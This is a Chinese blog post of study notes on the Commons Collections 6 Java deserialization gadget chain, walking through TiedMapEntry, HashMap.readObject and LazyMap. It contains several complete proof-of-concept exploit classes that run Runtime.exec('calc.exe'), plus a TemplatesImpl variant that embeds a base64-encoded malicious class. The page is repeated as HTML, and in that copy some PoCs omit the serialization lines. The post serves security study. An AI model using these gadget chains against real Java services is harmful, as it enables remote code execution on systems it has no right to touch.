JAVA安全-Commons Collections 6

博主：辰兮吖
发布时间：2024 年 09 月 19 日
93 次浏览
暂无评论
13651字数
分类： WEB学习笔记

Commons Collections 6

前言

cc1不管是TransformedMap，还是LazyMap，在Java高版本(8u71之后)，都不能再利用了，主要问题是出在AnnotationInvocationHandler类中的（在8u71后不再直接使用反序列化得到的Map对象，而是新建了一个LinkedHashMap对象，并将原来的键值添加进去。所以后续对Map的操作都是基于这个新的LinkedHashMap对象，不对我们构造的 Map 进行 set 或 put 操作，也就无法触发链子），而CommonsCollections6是个相对来说比较通用的。

解决Java高版本利用问题的核心，实际上就是寻找其它调用LazyMap#get() 的方式。

TiedMapEntry

本次我们利用org.apache.commons.collections.keyvalue.TiedMapEntry

package org.apache.commons.collections.keyvalue;
import java.io.Serializable;
import java.util.Map;
import java.util.Map.Entry;
import org.apache.commons.collections.KeyValue;
public class TiedMapEntry implements Entry, KeyValue, Serializable {
    private static final long serialVersionUID = -8453869361373831205L;
    private final Map map;
    private final Object key;
    public TiedMapEntry(Map map, Object key) {
        this.map = map;
        this.key = key;
    }
    public Object getKey() {
        return this.key;
    }
    public Object getValue() {
        return this.map.get(this.key);//触发点
    }
    // ...
    public int hashCode() {
        Object value = this.getValue();
        return (this.getKey() == null ? 0 : this.getKey().hashCode()) ^(value == null ? 0 : value.hashCode());
    }
    // ...
}

在getValue()中调用了this.map.get()，然后在hashCode()中又调用了getValue()，所以说我们现在的核心就是找到哪里调用了TiedMapEntry中的hashCode(),然后重点找一下怎么调用TiedMapEntry中的hashCode()

在java.util.HashMap#readObject中可以调用HashMap#hash()，然后再调用TiedMapEntry#hashCode()就行了

HashMap

public class HashMap<K,V> extends AbstractMap<K,V>
    implements Map<K,V>, Cloneable, Serializable {
    // ...
    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
        }
    // ...
    private void readObject(java.io.ObjectInputStream s)throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        // ...
        // Read the keys and values, and put the mappings in the HashMap
        for (int i = 0; i < mappings; i++) {
            @SuppressWarnings("unchecked")
            K key = (K) s.readObject();
            @SuppressWarnings("unchecked")
            V value = (V) s.readObject();
            putVal(hash(key), key, value, false, false);
        }
    }
 }

readObject->hash->key.hashCode()

将key赋为我们的TiedMapEntry即可调用TiedMapEntry#hashCode()

POC

HashMap中的readObject()方法中可以调hash方法，而在hash()方法中会调用key.hashCode()，那我们就把需要执行hashCode方法的对象放在key位置上就好了，然后在TiedMapEntry中的hashCode方法里面会调用getValue方法，然后就可以触发LazyMap中的get方法，就和前面的cc1一样

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections6_1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec", new Class[] { String.class}, new String[] { "calc.exe" }),};
        Transformer transformerChain = new ChainedTransformer(transformers);
        // 不再使⽤原CommonsCollections6中的HashSet，直接使⽤HashMap
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");
        
        // ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

同样cc6也可以像ysoserial中先添加一个虚假的Transformer，然后最后再将我们构造的有毒的Transformer添加进去，这样可以避免一些本地调试或者其他很多问题。比如

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.util.Reflections;

import java.io.*;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections6_1 {
    public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{ new ConstantTransformer(1) };
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec", new Class[] { String.class}, new String[] { "calc.exe" }),
            new ConstantTransformer(1),};
        Transformer transformerChain = new ChainedTransformer(faketransformers);
        // 不再使⽤原CommonsCollections6中的HashSet，直接使⽤HashMap
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");

        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);

        // ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}

但当我们加上假的Transformer数组，后面再变成真的之后，会发现一个问题，那就是命令并没有执行。

对这条链子进行调试可以发现问题出现在expMap.put(tme, "valuevalue");

public Object get(Object key) {
    if (!super.map.containsKey(key)) {
        Object value = this.factory.transform(key);
        super.map.put(key, value);
        return value;
    } else {
        return super.map.get(key);
    }
}

HashMap.put()方法里也调用了hash()方法，相当于把整个漏洞触发的过程提前触发了。而第一次传入的是假的Transformer数组，这时候super.map.containsKey(key)返回false进入 if 语句执行super.map.put()操作，把”keykey”放进去了就出问题了。第二次真正的Transformer数组传进来时map.containsKey(key)为true，就进不了 if 而无法触发漏洞

这里的解决方法也就很简单，只需要将这个Key，再从outerMap中移除即可： outerMap.remove("keykey");

最终

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections_6 {
    public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc.exe"}),
                new ConstantTransformer(1),};
        Transformer transformerChain = new ChainedTransformer(faketransformers);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");
        outerMap.remove("keykey");

        setFieldValue(transformerChain, "iTransformers", transformers);

        // ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }

    public static void setFieldValue(Object obj, String field, Object value) throws NoSuchFieldException, IllegalAccessException {
        Field field1 = obj.getClass().getDeclaredField(field);
        field1.setAccessible(true);
        field1.set(obj, value);
    }//ysoserial中的函数
}

cc6+TemplatesImpl

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

import java.lang.reflect.Field;
import java.util.Base64;

public class CommonsCollections_3 {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{new ConstantTransformer(1)};
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIwoABwAUBwAVCAAWCgAXABgKABcAGQcAGgcAGwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAcAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAHQEAClNvdXJjZUZpbGUBAAlldmlsLmphdmEMAA8AEAEAEGphdmEvbGFuZy9TdHJpbmcBAAhjYWxjLmV4ZQcAHgwAHwAgDAAhACIBABN5c29zZXJpYWwvdGVzdC9ldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAYABwAAAAAAAwABAAgACQACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAACwAMAAAABAABAA0AAQAIAA4AAgAKAAAAGQAAAAQAAAABsQAAAAEACwAAAAYAAQAAAA0ADAAAAAQAAQANAAEADwAQAAIACgAAADsABAACAAAAFyq3AAEEvQACWQMSA1NMuAAEK7YABVexAAAAAQALAAAAEgAEAAAADwAEABAADgARABYAEgAMAAAABAABABEAAQASAAAAAgAT");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "L1mbo");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        Transformer[] transformers = new Transformer[]{new ConstantTransformer(obj), new InvokerTransformer("newTransformer", null, null)};
        Transformer transformersChain = new ChainedTransformer(faketransformers);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformersChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");
        outerMap.remove("keykey");

        setFieldValue(transformersChain, "iTransformers", transformers);

        // ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }
}

最后修改：2024 年 09 月 19 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

但行莫问前程
浏览次数: 14501
WEB基础漏洞笔记
浏览次数: 1212
Flask中pin码计算
浏览次数: 765
PHP GC回收机制（Garbage Collection）与Phar
浏览次数: 493
Python 原型链污染变体
浏览次数: 404

Nodejs基础 —原型链污染
浏览次数: 280
Linux提权
浏览次数: 378
JAVA安全-CommonsCollections 3
浏览次数: 83
JAVA安全-Commons Collections 6
浏览次数: 94
题目记录
浏览次数: 314

JAVA安全-Commons Collections 6

辰兮吖 • 2024 年 09 月 19 日

<h1>Commons Collections 6</h1><h2>前言</h2><p>cc1不管是<code>TransformedMap</code>，还是<code>LazyMap</code>，在Java高版本(8u71之后)，都不能再利用了，主要问题是出在<code>AnnotationInvocationHandler</code>类中的（在8u71后不再直接使用反序列化得到的Map对象，而是新建了一个<code>LinkedHashMap</code>对象，并将原来的键值添加进去。 所以后续对Map的操作都是基于这个新的<code>LinkedHashMap</code>对象，不对我们构造的 Map 进行 set 或 put 操作，也就无法触发链子），而<code>CommonsCollections6</code>是个相对来说比较通用的。</p><p>解决Java高版本利用问题的核心，实际上就是寻找其它调用<code>LazyMap#get()</code> 的方式。</p><h2>TiedMapEntry</h2><p>本次我们利用<code>org.apache.commons.collections.keyvalue.TiedMapEntry</code></p><pre><code>package org.apache.commons.collections.keyvalue;
import java.io.Serializable;
import java.util.Map;
import java.util.Map.Entry;
import org.apache.commons.collections.KeyValue;
public class TiedMapEntry implements Entry, KeyValue, Serializable {
    private static final long serialVersionUID = -8453869361373831205L;
    private final Map map;
    private final Object key;
    public TiedMapEntry(Map map, Object key) {
        this.map = map;
        this.key = key;
    }
    public Object getKey() {
        return this.key;
    }
    public Object getValue() {
        return this.map.get(this.key);//触发点
    }
    // ...
    public int hashCode() {
        Object value = this.getValue();
        return (this.getKey() == null ? 0 : this.getKey().hashCode()) ^(value == null ? 0 : value.hashCode());
    }
    // ...
}</code></pre><p>在<code>getValue()</code>中调用了<code>this.map.get()</code>，然后在<code>hashCode()</code>中又调用了<code>getValue()</code>，所以说我们现在的核心就是找到哪里调用了<code>TiedMapEntry</code>中的<code>hashCode()</code>,然后重点找一下怎么调用<code>TiedMapEntry</code>中的<code>hashCode()</code></p><p>在<code>java.util.HashMap#readObject</code>中可以调用<code>HashMap#hash()</code>，然后再调用<code>TiedMapEntry#hashCode()</code>就行了</p><h2>HashMap</h2><pre><code>public class HashMap&lt;K,V&gt; extends AbstractMap&lt;K,V&gt;
    implements Map&lt;K,V&gt;, Cloneable, Serializable {
    // ...
    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h &gt;&gt;&gt; 16);
        }
    // ...
    private void readObject(java.io.ObjectInputStream s)throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        // ...
        // Read the keys and values, and put the mappings in the HashMap
        for (int i = 0; i &lt; mappings; i++) {
            @SuppressWarnings(&quot;unchecked&quot;)
            K key = (K) s.readObject();
            @SuppressWarnings(&quot;unchecked&quot;)
            V value = (V) s.readObject();
            putVal(hash(key), key, value, false, false);
        }
    }
 }</code></pre><p><code>readObject</code>-&gt;<code>hash</code>-&gt;<code>key.hashCode()</code></p><p>将key赋为我们的TiedMapEntry即可调用<code>TiedMapEntry#hashCode()</code></p><h2>POC</h2><p><code>HashMap</code>中的<code>readObject()</code>方法中可以调<code>hash</code>方法，而在<code>hash()</code>方法中会调用<code>key.hashCode()</code>，那我们就把需要执行<code>hashCode</code>方法的对象放在<code>key</code>位置上就好了，然后在<code>TiedMapEntry</code>中的<code>hashCode</code>方法里面会调用<code>getValue</code>方法，然后就可以触发<code>LazyMap</code>中的<code>get</code>方法，就和前面的cc1一样</p><pre><code class="lang-java">import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections6_1 {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer(&quot;getMethod&quot;, new Class[] {String.class, Class[].class }, new Object[] { &quot;getRuntime&quot;, new Class[0] }),
            new InvokerTransformer(&quot;invoke&quot;, new Class[] {Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer(&quot;exec&quot;, new Class[] { String.class}, new String[] { &quot;calc.exe&quot; }),};
        Transformer transformerChain = new ChainedTransformer(transformers);
        // 不再使⽤原CommonsCollections6中的HashSet，直接使⽤HashMap
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

TiedMapEntry tme = new TiedMapEntry(outerMap, &quot;keykey&quot;);

Map expMap = new HashMap();
        expMap.put(tme, &quot;valuevalue&quot;);
        
        // ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}</code></pre><p>同样cc6也可以像<code>ysoserial</code>中先添加一个虚假的Transformer，然后最后再将我们构造的有毒的Transformer添加进去，这样可以避免一些本地调试或者其他很多问题。比如</p><pre><code>import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.util.Reflections;

import java.io.*;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections6_1 {
    public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{ new ConstantTransformer(1) };
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer(&quot;getMethod&quot;, new Class[] {String.class, Class[].class }, new Object[] { &quot;getRuntime&quot;, new Class[0] }),
            new InvokerTransformer(&quot;invoke&quot;, new Class[] {Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer(&quot;exec&quot;, new Class[] { String.class}, new String[] { &quot;calc.exe&quot; }),
            new ConstantTransformer(1),};
        Transformer transformerChain = new ChainedTransformer(faketransformers);
        // 不再使⽤原CommonsCollections6中的HashSet，直接使⽤HashMap
        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

TiedMapEntry tme = new TiedMapEntry(outerMap, &quot;keykey&quot;);

Map expMap = new HashMap();
        expMap.put(tme, &quot;valuevalue&quot;);

Reflections.setFieldValue(transformerChain, &quot;iTransformers&quot;, transformers);

// ⽣成序列化字符串
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(expMap);
        oos.close();

System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}</code></pre><p>但当我们加上假的<code>Transformer</code>数组，后面再变成真的之后，会发现一个问题，那就是命令并没有执行。</p><p>对这条链子进行调试可以发现问题出现在<code>expMap.put(tme, &quot;valuevalue&quot;);</code></p><pre><code>public Object get(Object key) {
    if (!super.map.containsKey(key)) {
        Object value = this.factory.transform(key);
        super.map.put(key, value);
        return value;
    } else {
        return super.map.get(key);
    }
}</code></pre><p><code>HashMap.put()</code>方法里也调用了<code>hash()</code>方法，相当于把整个漏洞触发的过程提前触发了。而第一次传入的是假的Transformer数组，这时候<code>super.map.containsKey(key)</code>返回<code>false</code>进入 if 语句执行<code>super.map.put()</code>操作，把”keykey”放进去了就出问题了。第二次真正的Transformer数组传进来时<code>map.containsKey(key)</code>为<code>true</code>，就进不了 if 而无法触发漏洞</p><p>这里的解决方法也就很简单，只需要将这个<code>Key</code>，再从<code>outerMap</code>中移除即可： <code>outerMap.remove(&quot;keykey&quot;);</code></p><p>最终</p><pre><code>import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CommonsCollections_6 {
    public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(&quot;getMethod&quot;, new Class[]{String.class, Class[].class}, new Object[]{&quot;getRuntime&quot;, new Class[0]}),
                new InvokerTransformer(&quot;invoke&quot;, new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer(&quot;exec&quot;, new Class[]{String.class}, new String[]{&quot;calc.exe&quot;}),
                new ConstantTransformer(1),};
        Transformer transformerChain = new ChainedTransformer(faketransformers);

Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

TiedMapEntry tme = new TiedMapEntry(outerMap, &quot;keykey&quot;);

Map expMap = new HashMap();
        expMap.put(tme, &quot;valuevalue&quot;);
        outerMap.remove(&quot;keykey&quot;);

setFieldValue(transformerChain, &quot;iTransformers&quot;, transformers);

System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }

public static void setFieldValue(Object obj, String field, Object value) throws NoSuchFieldException, IllegalAccessException {
        Field field1 = obj.getClass().getDeclaredField(field);
        field1.setAccessible(true);
        field1.set(obj, value);
    }//ysoserial中的函数
}</code></pre><h2>cc6+TemplatesImpl</h2><pre><code>import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

import java.lang.reflect.Field;
import java.util.Base64;

public class CommonsCollections_3 {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

public static void main(String[] args) throws Exception {
        Transformer[] faketransformers = new Transformer[]{new ConstantTransformer(1)};
        byte[] code = Base64.getDecoder().decode(&quot;yv66vgAAADQAIwoABwAUBwAVCAAWCgAXABgKABcAGQcAGgcAGwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAcAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAHQEAClNvdXJjZUZpbGUBAAlldmlsLmphdmEMAA8AEAEAEGphdmEvbGFuZy9TdHJpbmcBAAhjYWxjLmV4ZQcAHgwAHwAgDAAhACIBABN5c29zZXJpYWwvdGVzdC9ldmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAYABwAAAAAAAwABAAgACQACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAACwAMAAAABAABAA0AAQAIAA4AAgAKAAAAGQAAAAQAAAABsQAAAAEACwAAAAYAAQAAAA0ADAAAAAQAAQANAAEADwAQAAIACgAAADsABAACAAAAFyq3AAEEvQACWQMSA1NMuAAEK7YABVexAAAAAQALAAAAEgAEAAAADwAEABAADgARABYAEgAMAAAABAABABEAAQASAAAAAgAT&quot;);
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, &quot;_bytecodes&quot;, new byte[][]{code});
        setFieldValue(obj, &quot;_name&quot;, &quot;L1mbo&quot;);
        setFieldValue(obj, &quot;_tfactory&quot;, new TransformerFactoryImpl());
        Transformer[] transformers = new Transformer[]{new ConstantTransformer(obj), new InvokerTransformer(&quot;newTransformer&quot;, null, null)};
        Transformer transformersChain = new ChainedTransformer(faketransformers);

Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformersChain);

TiedMapEntry tme = new TiedMapEntry(outerMap, &quot;keykey&quot;);

Map expMap = new HashMap();
        expMap.put(tme, &quot;valuevalue&quot;);
        outerMap.remove(&quot;keykey&quot;);

setFieldValue(transformersChain, &quot;iTransformers&quot;, transformers);

System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }
}</code></pre>

Commons Collections 6

前言

TiedMapEntry

HashMap

POC

cc6+TemplatesImpl

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

JAVA安全-Commons Collections 6

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款